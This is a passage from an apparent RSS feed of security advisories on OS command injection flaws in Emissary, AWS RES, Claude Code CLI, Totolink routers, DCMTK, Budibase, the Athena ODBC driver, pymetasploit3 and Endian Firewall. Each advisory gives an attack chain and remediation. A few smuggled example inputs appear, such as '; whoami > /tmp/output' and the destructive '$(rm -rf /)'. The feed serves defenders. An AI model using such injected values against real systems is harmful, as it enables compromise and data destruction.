]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>privilege-escalation</category><category>coolercontrol</category></item><item><title>Emissary OS Command Injection Vulnerability (CVE-2026-35581)</title><link>https://feed.craftedsignal.io/briefs/2026-04-emissary-command-injection/</link><pubDate>Tue, 07 Apr 2026 17:16:33 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-emissary-command-injection/</guid><description>Emissary, a P2P data-driven workflow engine, is vulnerable to OS command injection due to insufficient sanitization of the PLACE_NAME parameter in versions prior to 8.39.0, allowing for arbitrary command execution.</description><content:encoded><![CDATA[<p>Emissary is a P2P-based data-driven workflow engine. Prior to version 8.39.0, a critical vulnerability, CVE-2026-35581, existed within the Executrix utility class. This class constructs shell commands by concatenating configuration-derived values, specifically the PLACE_NAME parameter, without proper sanitization. The inadequate sanitization process only replaced spaces with underscores, leaving shell metacharacters (;, |, $, `, (, ), etc.) vulnerable to injection. This flaw allows attackers to inject arbitrary commands into the /bin/sh -c command execution. Emissary version 8.39.0 addresses and resolves this command injection vulnerability. This vulnerability allows for privilege escalation to an attacker with high priviledges.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker with high privileges gains access to the Emissary configuration.</li>
<li>The attacker modifies the PLACE_NAME configuration parameter to include malicious shell metacharacters (e.g., <code>; whoami &gt; /tmp/output</code>).</li>
<li>The system uses the modified PLACE_NAME parameter to construct a shell command.</li>
<li>The Executrix utility class executes the command via <code>/bin/sh -c</code>.</li>
<li>The injected shell metacharacters allow the attacker&rsquo;s command (<code>whoami</code>) to execute.</li>
<li>The output of the command is written to <code>/tmp/output</code>, confirming arbitrary command execution.</li>
<li>The attacker can then use the initial foothold to escalate privileges further.</li>
<li>The attacker gains full control of the affected system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-35581 allows a high-privilege attacker to achieve arbitrary command execution on the Emissary server. The CVSS v3.1 score of 7.2 indicates a high level of severity. Depending on the Emissary deployment, this could lead to data breaches, service disruption, or complete system compromise. The number of victims and specific sectors targeted are currently unknown.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Emissary to version 8.39.0 or later to remediate CVE-2026-35581.</li>
<li>Monitor Emissary configuration files for unauthorized modifications to the PLACE_NAME parameter.</li>
<li>Implement input validation and sanitization for all configuration parameters to prevent command injection attacks.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious PLACE_NAME Parameter Modification</code> to detect exploitation attempts.</li>
<li>Enable command-line auditing to log all commands executed by the Emissary process.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve</category><category>command injection</category><category>emissary</category></item><item><title>AWS Research and Engineering Studio OS Command Injection Vulnerability (CVE-2026-5707)</title><link>https://feed.craftedsignal.io/briefs/2026-04-aws-res-cmd-injection/</link><pubDate>Mon, 06 Apr 2026 22:16:25 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-aws-res-cmd-injection/</guid><description>A remote authenticated attacker can execute arbitrary commands as root on the virtual desktop host by crafting a malicious session name in AWS Research and Engineering Studio (RES) versions 2025.03 through 2025.12.01 due to unsanitized input, leading to complete system compromise.</description><content:encoded><![CDATA[<p>CVE-2026-5707 is an OS command injection vulnerability affecting AWS Research and Engineering Studio (RES) versions 2025.03 through 2025.12.01. The vulnerability resides in the virtual desktop session name handling, where user-supplied input is not properly sanitized before being used in an OS command. A remote, authenticated attacker can exploit this flaw by providing a specially crafted session name, leading to arbitrary command execution as root on the virtual desktop host. Successful exploitation allows the attacker to gain full control over the affected host, potentially compromising sensitive data and disrupting services. Users are advised to upgrade to RES version 2026.03 or apply the corresponding mitigation patch to their existing environment. The vulnerability was reported on April 6, 2026.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker authenticates to the AWS RES environment with valid credentials.</li>
<li>The attacker initiates a request to create a new virtual desktop session.</li>
<li>The attacker crafts a malicious session name containing OS command injection payload.</li>
<li>The malicious session name is passed to the vulnerable function in AWS RES without proper sanitization.</li>
<li>The vulnerable function executes an OS command, incorporating the unsanitized session name.</li>
<li>The injected command within the session name is executed with root privileges on the virtual desktop host.</li>
<li>The attacker gains arbitrary command execution, allowing them to install malware, create new users, or modify system configurations.</li>
<li>The attacker achieves complete control of the virtual desktop host.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5707 allows a remote attacker to execute arbitrary commands with root privileges on the virtual desktop host. This can lead to a complete compromise of the system, potentially affecting all users and data within the AWS RES environment. The attacker can steal sensitive information, install persistent backdoors, or disrupt critical services. The exact number of potential victims is unknown, but any organization utilizing vulnerable versions of AWS RES is at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately upgrade AWS Research and Engineering Studio (RES) to version 2026.03 or apply the recommended mitigation patch to address CVE-2026-5707.</li>
<li>Implement input validation and sanitization for all user-supplied data, especially session names, to prevent OS command injection vulnerabilities.</li>
<li>Monitor AWS RES logs for suspicious activity related to session creation and command execution on the virtual desktop hosts.</li>
<li>Deploy the Sigma rule &ldquo;Detect Suspicious Session Names with OS Command Injection Characters&rdquo; to identify potential exploitation attempts.</li>
<li>Review and harden the security configurations of the virtual desktop hosts to limit the impact of potential command execution.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve</category><category>command-injection</category><category>aws</category><category>res</category></item><item><title>Anthropic Claude Code CLI/SDK OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-claude-command-injection/</link><pubDate>Mon, 06 Apr 2026 20:16:25 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-claude-command-injection/</guid><description>CVE-2026-35022 describes an OS command injection vulnerability in the Anthropic Claude Code CLI and Claude Agent SDK that allows attackers with control over authentication settings to execute arbitrary commands, potentially leading to credential theft and environment variable exfiltration.</description><content:encoded><![CDATA[<p>The Anthropic Claude Code CLI and Claude Agent SDK are vulnerable to OS command injection (CVE-2026-35022). This vulnerability stems from the insecure execution of authentication helper configuration values. Specifically, the application executes commands using <code>shell=true</code> without proper input validation on parameters such as <code>apiKeyHelper</code>, <code>awsAuthRefresh</code>, <code>awsCredentialExport</code>, and <code>gcpAuthRefresh</code>. An attacker who can manipulate these authentication settings can inject shell metacharacters to execute arbitrary commands with the privileges of the user or automation environment running the Claude CLI or SDK. This can lead to credential theft and the exfiltration of sensitive environment variables. Defenders should focus on detecting attempts to modify authentication settings or the execution of commands originating from the Claude CLI or SDK with suspicious arguments.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to the configuration settings of the Anthropic Claude Code CLI or Claude Agent SDK. This could be achieved through compromised credentials or a separate vulnerability.</li>
<li>The attacker modifies the <code>apiKeyHelper</code>, <code>awsAuthRefresh</code>, <code>awsCredentialExport</code>, or <code>gcpAuthRefresh</code> parameters within the authentication configuration.</li>
<li>The attacker injects shell metacharacters (e.g., <code>;</code>, <code>|</code>, <code>&amp;&amp;</code>) into these parameters, crafting malicious commands.</li>
<li>The Claude CLI or SDK attempts to authenticate, executing the configured helper command using <code>shell=true</code>.</li>
<li>The injected shell metacharacters cause the operating system to execute the attacker&rsquo;s malicious commands.</li>
<li>The attacker&rsquo;s commands steal credentials stored on the system.</li>
<li>The attacker&rsquo;s commands exfiltrate sensitive environment variables to an external server.</li>
<li>The attacker uses the stolen credentials and environment variables to gain further access to the victim&rsquo;s systems or data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-35022 allows attackers to execute arbitrary commands on the system running the Anthropic Claude Code CLI or Claude Agent SDK. This can lead to the theft of sensitive credentials, such as API keys and AWS credentials, and the exfiltration of environment variables containing sensitive information. The impact includes unauthorized access to cloud resources, data breaches, and potential supply chain compromise if the compromised environment is used for software development or deployment. The scope of the impact depends on the permissions of the user or automation environment running the vulnerable software.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor process execution for suspicious commands originating from the Claude CLI or SDK with command-line arguments containing shell metacharacters. Implement the Sigma rule &ldquo;Detect Claude CLI/SDK Command Injection via Shell Metacharacters&rdquo;.</li>
<li>Implement strict access control policies to limit who can modify the configuration settings of the Claude CLI or SDK.</li>
<li>Regularly audit the configuration settings of the Claude CLI or SDK for any unauthorized changes.</li>
<li>Patch CVE-2026-35022 as soon as a patch is available from Anthropic.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>cve-2026-35022</category><category>anthropic</category><category>claude</category></item><item><title>Anthropic Claude Code CLI/Agent SDK OS Command Injection Vulnerability (CVE-2026-35021)</title><link>https://feed.craftedsignal.io/briefs/2026-04-claude-code-cmd-injection/</link><pubDate>Mon, 06 Apr 2026 20:16:25 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-claude-code-cmd-injection/</guid><description>The Anthropic Claude Code CLI and Claude Agent SDK are vulnerable to OS command injection via crafted file paths, allowing arbitrary command execution.</description><content:encoded><![CDATA[<p>The Anthropic Claude Code CLI and Claude Agent SDK are susceptible to an OS command injection vulnerability, as detailed in CVE-2026-35021. This flaw stems from the insufficient sanitization of file paths within the prompt editor invocation utility. An attacker can exploit this vulnerability by injecting shell metacharacters into file paths, which are then interpolated into shell commands executed using <code>execSync</code>. The use of double quotes around the file path does not prevent command substitution, enabling attackers to execute arbitrary commands with the privileges of the user running the CLI, creating a high-risk scenario for compromised systems.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker crafts a malicious file path containing shell metacharacters (e.g., <code>$()</code>, backticks).</li>
<li>The malicious file path is provided as input to the Anthropic Claude Code CLI or Agent SDK, specifically targeting the prompt editor invocation utility.</li>
<li>The application interpolates the attacker-controlled file path into a shell command.</li>
<li>The shell command, now containing the injected payload, is executed via the <code>execSync</code> function.</li>
<li>The shell interprets the injected metacharacters, triggering command substitution.</li>
<li>The attacker&rsquo;s injected commands are executed with the privileges of the user running the CLI or SDK.</li>
<li>The attacker gains arbitrary code execution on the system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows attackers to execute arbitrary commands on the affected system. This could lead to complete system compromise, data exfiltration, or deployment of malicious payloads such as ransomware. Due to the nature of the vulnerability, any system utilizing the Claude Code CLI or Agent SDK is potentially at risk if it processes untrusted file paths.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect Suspicious Claude CLI/Agent SDK Command Execution</code> to identify potential command injection attempts via process creation logs.</li>
<li>Monitor process creation events for command line arguments containing shell metacharacters being passed to processes spawned by the Claude CLI or Agent SDK using the <code>Process Creation with Shell Metacharacters</code> Sigma rule.</li>
<li>Apply any available patches or updates released by Anthropic to address CVE-2026-35021 once they are available.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-35021</category><category>command-injection</category><category>anthropic</category></item><item><title>Totolink A7100RU OS Command Injection Vulnerability (CVE-2026-5677)</title><link>https://feed.craftedsignal.io/briefs/2026-04-totolink-os-command-injection/</link><pubDate>Mon, 06 Apr 2026 19:16:30 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-totolink-os-command-injection/</guid><description>A remote OS command injection vulnerability (CVE-2026-5677) exists in the CsteSystem function of the /cgi-bin/cstecgi.cgi file in Totolink A7100RU firmware version 7.4cu.2313_b20191024 due to improper handling of the resetFlags argument.</description><content:encoded><![CDATA[<p>A critical OS command injection vulnerability, tracked as CVE-2026-5677, has been identified in Totolink A7100RU routers running firmware version 7.4cu.2313_b20191024. The vulnerability resides within the <code>CsteSystem</code> function of the <code>/cgi-bin/cstecgi.cgi</code> file. By manipulating the <code>resetFlags</code> argument, a remote attacker can inject and execute arbitrary operating system commands on the affected device. This exploit is publicly available, increasing the risk of widespread exploitation. Successful exploitation allows an attacker to gain complete control over the device, potentially leading to data theft, denial of service, or use of the router as part of a botnet.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable Totolink A7100RU router with firmware version 7.4cu.2313_b20191024.</li>
<li>The attacker sends a crafted HTTP request to the <code>/cgi-bin/cstecgi.cgi</code> endpoint.</li>
<li>The HTTP request includes the <code>resetFlags</code> argument with a malicious payload containing OS commands.</li>
<li>The <code>CsteSystem</code> function processes the request without proper sanitization of the <code>resetFlags</code> argument.</li>
<li>The injected OS commands are executed with the privileges of the web server process.</li>
<li>The attacker gains arbitrary code execution on the router&rsquo;s operating system.</li>
<li>The attacker can then install persistent backdoors, modify router settings, or use the device for further attacks.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5677 allows a remote attacker to execute arbitrary commands on vulnerable Totolink A7100RU routers. This can lead to complete compromise of the device, enabling attackers to steal sensitive information, disrupt network services, or use the router as a launchpad for other attacks, such as botnet participation or man-in-the-middle attacks. Given the widespread use of Totolink routers, a successful large-scale exploitation could affect thousands of users.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect Totolink A7100RU CsteSystem Command Injection Attempt</code> to your SIEM to identify malicious requests to the <code>/cgi-bin/cstecgi.cgi</code> endpoint.</li>
<li>Inspect web server logs for suspicious POST requests to <code>/cgi-bin/cstecgi.cgi</code> containing shell metacharacters in the <code>resetFlags</code> parameter to detect exploitation attempts (webserver logs).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-5677</category><category>totolink</category><category>command-injection</category><category>network-device</category></item><item><title>OFFIS DCMTK Command Injection Vulnerability (CVE-2026-5663)</title><link>https://feed.craftedsignal.io/briefs/2026-04-dcmtk-command-injection/</link><pubDate>Mon, 06 Apr 2026 15:17:16 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-dcmtk-command-injection/</guid><description>A remote command injection vulnerability exists in OFFIS DCMTK version 3.7.0 and earlier due to insufficient input sanitization in the `storescp` application, potentially allowing unauthenticated attackers to execute arbitrary OS commands.</description><content:encoded><![CDATA[<p>A command injection vulnerability, identified as CVE-2026-5663, affects OFFIS DCMTK (Dicom ToolKit) versions up to 3.7.0. The vulnerability is located within the <code>storescp</code> application, specifically in the <code>executeOnReception</code> and <code>executeOnEndOfStudy</code> functions of the <code>dcmnet/apps/storescp.cc</code> file. An attacker can exploit this flaw by manipulating input parameters processed by these functions, leading to arbitrary OS command execution on the server. Remote exploitation is possible, making this a critical issue for systems utilizing vulnerable DCMTK versions. Applying the patch edbb085e45788dccaf0e64d71534cfca925784b8, available on the DCMTK GitHub repository, is the recommended course of action.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a vulnerable OFFIS DCMTK instance running <code>storescp</code> exposed on the network.</li>
<li>The attacker crafts a malicious DICOM request containing specially crafted parameters designed to exploit the command injection vulnerability in the <code>executeOnReception</code> or <code>executeOnEndOfStudy</code> functions.</li>
<li>The <code>storescp</code> application receives the malicious DICOM request.</li>
<li>The vulnerable <code>executeOnReception</code> or <code>executeOnEndOfStudy</code> functions process the attacker-controlled parameters without proper sanitization.</li>
<li>The application attempts to execute a system command using the unsanitized input, injecting attacker-supplied code.</li>
<li>The injected code executes arbitrary commands on the underlying operating system with the privileges of the <code>storescp</code> process.</li>
<li>The attacker gains the ability to read sensitive files, modify system configurations, or execute malicious binaries.</li>
<li>The attacker establishes persistence on the system or pivots to other internal resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5663 can lead to complete compromise of the affected system. This allows an attacker to execute arbitrary commands, potentially leading to data theft, denial of service, or further propagation within the network. The healthcare sector, which relies heavily on DICOM for medical imaging, is particularly at risk. Unpatched DCMTK instances expose sensitive patient data and critical infrastructure to potential attacks.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patch <code>edbb085e45788dccaf0e64d71534cfca925784b8</code> from the DCMTK GitHub repository to remediate CVE-2026-5663 immediately.</li>
<li>Monitor network traffic for suspicious activity originating from or directed to DCMTK servers, specifically looking for unusual command execution patterns (see Sigma rule below).</li>
<li>Implement input validation and sanitization for all user-supplied data processed by DCMTK applications to prevent command injection vulnerabilities in the future.</li>
<li>Deploy the Sigma rules in this brief to your SIEM and tune for your environment.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>dcmtk</category><category>cve-2026-5663</category><category>storescp</category></item><item><title>Budibase Command Injection Vulnerability in Bash Automation Step</title><link>https://feed.craftedsignal.io/briefs/2026-04-budibase-cmd-injection/</link><pubDate>Sat, 04 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-budibase-cmd-injection/</guid><description>A command injection vulnerability exists in Budibase's bash automation step due to insufficient sanitization, allowing attackers with automation modification access to inject arbitrary shell commands, leading to remote code execution.</description><content:encoded><![CDATA[<p>A command injection vulnerability has been identified in Budibase versions prior to 3.33.4, specifically within the bash automation step located in <code>packages/server/src/automations/steps/bash.ts</code>. This flaw allows an attacker with permissions to create or modify automation workflows to inject arbitrary shell commands. The vulnerability stems from the usage of <code>execSync</code> to execute user-supplied commands without adequate sanitization or validation. Input is processed through <code>processStringSync</code>, enabling template interpolation that can be exploited for command injection. Successful exploitation could lead to remote code execution, complete system compromise, data exfiltration, and lateral movement within the affected infrastructure. Defenders should prioritize patching or implementing mitigations to prevent exploitation.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains access to the Budibase platform with the ability to create or modify automation workflows.</li>
<li>The attacker crafts a malicious payload containing shell commands embedded within template syntax (e.g., <code>$(rm -rf /)</code>, <code>; malicious-command</code>, <code>| malicious-command</code>).</li>
<li>The attacker injects the malicious payload into the <code>inputs.code</code> field of a bash automation step.</li>
<li>The <code>processStringSync</code> function processes the user-supplied input, interpolating the template syntax and generating a command string.</li>
<li>The <code>execSync</code> function executes the crafted command string without proper sanitization.</li>
<li>The injected shell commands execute on the server with the privileges of the Budibase application.</li>
<li>The attacker achieves remote code execution, potentially gaining control of the server.</li>
<li>The attacker can then perform actions such as data exfiltration, lateral movement, or system compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability can lead to severe consequences, including remote code execution (RCE) on the Budibase server. This could result in complete system compromise, allowing attackers to steal sensitive data, modify system configurations, or use the compromised system as a pivot point for further attacks within the network. While the exact number of affected organizations is unknown, any Budibase instance running a version prior to 3.33.4 is potentially vulnerable.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately disable the bash automation step in production environments to prevent further exploitation.</li>
<li>Upgrade Budibase to version 3.33.4 or later, where this vulnerability is addressed.</li>
<li>Implement the command sanitization and validation techniques outlined in the provided example fix.</li>
<li>If upgrading is not immediately feasible, implement a whitelist of allowed commands to restrict the functionality of the bash automation step.</li>
<li>Enable and review Budibase application logs for any unusual or suspicious command execution patterns (reference: Overview section).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>budibase</category></item><item><title>Amazon Athena ODBC Driver OS Command Injection Vulnerability (CVE-2026-5485)</title><link>https://feed.craftedsignal.io/briefs/2026-04-athena-odbc-cmd-injection/</link><pubDate>Sat, 04 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-athena-odbc-cmd-injection/</guid><description>A critical OS command injection vulnerability (CVE-2026-5485) in the Amazon Athena ODBC driver before 2.0.5.1 for Linux allows local attackers to execute arbitrary code via specially crafted connection parameters.</description><content:encoded><![CDATA[<p>CVE-2026-5485 is an OS command injection vulnerability affecting the Amazon Athena ODBC driver before version 2.0.5.1 on Linux systems. The vulnerability resides in the browser-based authentication component of the driver. A local attacker can exploit this flaw by crafting malicious connection parameters that are then processed by the driver during a locally initiated connection attempt. Successful exploitation allows the attacker to execute arbitrary commands on the underlying system with the privileges of the user running the ODBC driver. This poses a significant risk to systems using vulnerable versions of the driver. The vulnerability was published on April 3, 2026.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains local access to a Linux system with the vulnerable Amazon Athena ODBC driver installed (version before 2.0.5.1).</li>
<li>The attacker crafts specially crafted connection parameters designed to inject OS commands. This could involve manipulating fields expected by the driver to trigger command execution.</li>
<li>The attacker initiates a connection to Amazon Athena using the vulnerable ODBC driver and the crafted connection parameters.</li>
<li>The ODBC driver attempts to authenticate using the browser-based authentication component, loading the malicious connection parameters.</li>
<li>Due to the vulnerability, the crafted parameters are not properly sanitized, leading to OS command injection.</li>
<li>The injected OS commands are executed on the system with the privileges of the user running the ODBC driver.</li>
<li>The attacker can leverage the command execution to install malware, create new user accounts, or exfiltrate sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5485 allows an attacker to execute arbitrary commands on a vulnerable Linux system. The impact includes potential data theft, system compromise, and lateral movement within the network. Given the nature of command injection, the attacker has significant control over the compromised system, allowing for a wide range of malicious activities. Organizations using the affected Amazon Athena ODBC driver on Linux should prioritize patching to mitigate this risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the Amazon Athena ODBC driver to version 2.0.5.1 or later on all Linux systems to remediate CVE-2026-5485.</li>
<li>Monitor process creation events on Linux systems for unusual processes spawned by the ODBC driver using the Sigma rules provided below.</li>
<li>Implement strict access control policies on Linux systems to limit the ability of attackers to leverage local access to exploit the vulnerability.</li>
<li>Enable logging for ODBC driver activity and review logs for suspicious connection attempts.</li>
<li>Deploy the provided Sigma rule to detect potential exploitation attempts by monitoring for command line arguments indicative of command injection.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-5485</category><category>command injection</category><category>athena</category><category>odbc</category><category>linux</category></item><item><title>Amazon Athena ODBC Driver Command Injection Vulnerability (CVE-2026-35558)</title><link>https://feed.craftedsignal.io/briefs/2026-04-athena-odbc-injection/</link><pubDate>Fri, 03 Apr 2026 21:17:11 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-athena-odbc-injection/</guid><description>A command injection vulnerability (CVE-2026-35558) exists in the Amazon Athena ODBC driver before 2.1.0.0 due to improper neutralization of special elements in connection parameters, potentially leading to arbitrary code execution or authentication redirection.</description><content:encoded><![CDATA[<p>The Amazon Athena ODBC driver versions prior to 2.1.0.0 are susceptible to a command injection vulnerability, identified as CVE-2026-35558. This flaw arises from the driver&rsquo;s failure to properly neutralize special elements within connection parameters during the authentication process. A remote attacker could exploit this vulnerability by crafting malicious connection strings that, when processed by the vulnerable driver, allow for the execution of arbitrary code on the system or redirection of the authentication flow. The vulnerability was disclosed on April 3, 2026. Organizations utilizing the affected Amazon Athena ODBC driver versions on Windows, Linux, and macOS systems are at risk. Upgrade to version 2.1.0.0 to mitigate the risk.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a system using a vulnerable version of the Amazon Athena ODBC driver (prior to 2.1.0.0).</li>
<li>The attacker crafts a malicious ODBC connection string containing special characters or commands designed to be executed by the underlying operating system.</li>
<li>A user or application attempts to connect to Amazon Athena using the crafted connection string.</li>
<li>The vulnerable Amazon Athena ODBC driver processes the connection string, failing to properly neutralize the special elements.</li>
<li>The injected commands are executed by the operating system, potentially allowing the attacker to gain control of the system. This is due to the driver calling system functions to process the parameters without proper sanitization.</li>
<li>The attacker could install malware, exfiltrate sensitive data, or pivot to other systems on the network.</li>
<li>Alternatively, the attacker can redirect the authentication flow to a malicious server.</li>
<li>The attacker gains unauthorized access to the Athena database or the system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-35558 allows an attacker to execute arbitrary code on the affected system with the privileges of the user running the application using the ODBC driver. This can lead to complete system compromise, including data theft, system corruption, or use of the compromised system as a foothold for further attacks within the organization&rsquo;s network. While specific victim numbers are unknown, any system using a vulnerable version of the Amazon Athena ODBC driver is at risk. Sectors impacted depend on which organizations use Athena and the vulnerable ODBC driver.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately upgrade the Amazon Athena ODBC driver to version 2.1.0.0 or later on all affected systems (Windows, Linux, macOS) to remediate CVE-2026-35558, as recommended by Amazon in their security bulletin.</li>
<li>Implement strict input validation and sanitization for all connection parameters passed to the Amazon Athena ODBC driver to prevent exploitation of command injection vulnerabilities, mitigating the risk even if an older driver version is temporarily in use.</li>
<li>Enable process creation logging with command line arguments and monitor for unusual processes spawned by the Athena ODBC driver executable (e.g., <code>AmazonAthenaODBC.exe</code> on Windows) to detect potential command injection attempts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command injection</category><category>cve-2026-35558</category><category>athena</category></item><item><title>Pymetasploit3 Command Injection Vulnerability (CVE-2026-5463)</title><link>https://feed.craftedsignal.io/briefs/2026-04-pymetasploit3-cmd-injection/</link><pubDate>Fri, 03 Apr 2026 05:16:24 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-pymetasploit3-cmd-injection/</guid><description>A command injection vulnerability in pymetasploit3 versions up to 1.0.6 allows attackers to inject newline characters into module options, leading to arbitrary command execution within Metasploit sessions.</description><content:encoded><![CDATA[<p>A command injection vulnerability, identified as CVE-2026-5463, affects pymetasploit3 versions up to 1.0.6. This flaw allows an attacker to inject newline characters into module options like RHOSTS when using the <code>console.run_module_with_output()</code> function. By exploiting this, attackers can break the intended command structure and inject malicious commands, causing the Metasploit console to execute unintended actions. Successful exploitation can lead to arbitrary command execution, potentially compromising the Metasploit session and the systems it interacts with. This vulnerability highlights the importance of careful input validation in security tools, as it can be leveraged to subvert their intended functionality. Defenders should be aware of the potential for unexpected behavior when using pymetasploit3 with untrusted input.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker crafts a malicious input string containing newline characters (<code>\n</code>) within a module option, such as the <code>RHOSTS</code> parameter.</li>
<li>The attacker supplies this malicious input to the <code>console.run_module_with_output()</code> function in pymetasploit3.</li>
<li>Pymetasploit3 fails to properly sanitize or validate the input, allowing the newline characters to pass through.</li>
<li>When the <code>run_module_with_output()</code> function processes the input, the newline characters are interpreted as command separators.</li>
<li>Metasploit console executes the injected commands alongside the intended module command, potentially leading to arbitrary command execution within the context of the Metasploit session.</li>
<li>Attacker gains control of the Metasploit session, allowing them to interact with target systems or pivot to other internal resources.</li>
<li>The attacker can then execute further commands to install malware, exfiltrate data, or perform other malicious activities.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5463 allows an attacker to execute arbitrary commands within the context of the Metasploit console. This could lead to the complete compromise of systems targeted by the Metasploit framework, potentially impacting numerous systems within a network depending on the attacker&rsquo;s objectives and the scope of the Metasploit session. If the attacker gains elevated privileges, the impact could include data breaches, system downtime, and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade pymetasploit3 to a version beyond 1.0.6 to remediate CVE-2026-5463.</li>
<li>Implement strict input validation and sanitization on any user-supplied data used in conjunction with <code>console.run_module_with_output()</code> to prevent command injection.</li>
<li>Monitor Metasploit console logs for unusual or unexpected commands being executed, as this could indicate exploitation attempts (enable enhanced logging if necessary to capture command details).</li>
<li>Deploy the Sigma rule provided to detect attempts to inject newline characters within arguments passed to modules via the <code>console.run_module_with_output()</code> function.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>metasploit</category><category>pymetasploit3</category></item><item><title>Endian Firewall Command Injection Vulnerability (CVE-2026-34791)</title><link>https://feed.craftedsignal.io/briefs/2026-04-endian-firewall-rce/</link><pubDate>Thu, 02 Apr 2026 15:16:42 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-endian-firewall-rce/</guid><description>Endian Firewall version 3.3.25 and prior allows authenticated users to execute arbitrary OS commands due to an OS command injection vulnerability in the DATE parameter of the /cgi-bin/logs_proxy.cgi endpoint.</description><content:encoded><![CDATA[<p>Endian Firewall version 3.3.25 and prior is susceptible to OS command injection. This vulnerability, identified as CVE-2026-34791, allows authenticated users to execute arbitrary operating system commands. The vulnerability exists due to insufficient validation of the DATE parameter in the <code>/cgi-bin/logs_proxy.cgi</code> script. The DATE parameter&rsquo;s value is used to construct a file path that is subsequently passed to a Perl <code>open()</code> call. Due to an incomplete regular expression validation, an attacker can inject malicious commands. Successful exploitation allows the attacker to gain complete control of the affected system.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An authenticated user accesses the <code>/cgi-bin/logs_proxy.cgi</code> endpoint.</li>
<li>The attacker crafts a malicious <code>DATE</code> parameter containing OS commands to be injected.</li>
<li>The <code>/cgi-bin/logs_proxy.cgi</code> script receives the <code>DATE</code> parameter.</li>
<li>The script constructs a file path using the unvalidated <code>DATE</code> parameter.</li>
<li>The script passes the crafted file path to a Perl <code>open()</code> call.</li>
<li>The Perl <code>open()</code> function executes the injected OS commands due to the incomplete regular expression validation.</li>
<li>The attacker gains arbitrary code execution on the system.</li>
<li>The attacker can then perform actions such as installing malware, creating user accounts, or exfiltrating sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
